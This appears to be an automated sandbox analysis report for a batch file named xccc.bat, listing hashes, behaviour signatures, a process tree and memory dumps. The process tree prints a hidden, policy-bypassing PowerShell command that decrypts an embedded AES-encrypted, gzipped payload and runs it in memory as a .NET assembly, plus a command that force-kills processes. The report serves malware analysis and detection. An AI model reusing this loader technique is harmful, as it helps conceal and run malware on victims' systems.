Analysis

  • max time kernel
    48s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/04/2024, 13:30

General

  • Target

    xccc.bat

  • Size

    1.6MB

  • MD5

    a1e6c524a6982d7148de18b82ccf4b4c

  • SHA1

    bfb6449c135de59fb53d65a11b7a1512e4d6ce97

  • SHA256

    c00cc28d3c1b0187d1971c7e399acd5d9acae5c8042cd8d08c5b492697e0d83d

  • SHA512

    a14cb2f7465cd82dab90d9445da7a362b11ff67100db57da886cfd84cce2ba926a889cb4360203ca94cd73728f93abe367421415bb788e090281e3822413a7d8

  • SSDEEP

    24576:BFjjUxX2aos0an5wdEc5R3eGmasM6MK4NWytx5qwmbw61OFW:BGxXjoY5wiqRuGmtw61X

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xccc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\system32\cmd.exe
      cmd.exe /c powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -Command "Get-Process OpenConsole | Stop-Process -Force"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    ad7de0d7a2ec30e00ec0a9fa3f15e977

    SHA1

    27aea52f1a027f2c60103f9d52c09c95a5245d46

    SHA256

    af54eae0430cd3775044e553ddfa95710073abac04606d3694cfdbaf5b921a85

    SHA512

    060e161e84af501aea3d057736ca0ccd901e0c1562faaeb1e292461238c3edf1fde38191396e04a64cab06e00314202d28321abaa6774564bb85a59320a27641

  • memory/1712-12-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1712-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1712-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1712-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

  • memory/1712-10-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

  • memory/1712-9-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

  • memory/1712-11-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

  • memory/1712-4-0x000000001B460000-0x000000001B742000-memory.dmp

    Filesize

    2.9MB

  • memory/1712-5-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/2612-18-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/2612-19-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-21-0x0000000002250000-0x0000000002258000-memory.dmp

    Filesize

    32KB

  • memory/2612-20-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2612-22-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-23-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2612-24-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2612-25-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2612-26-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB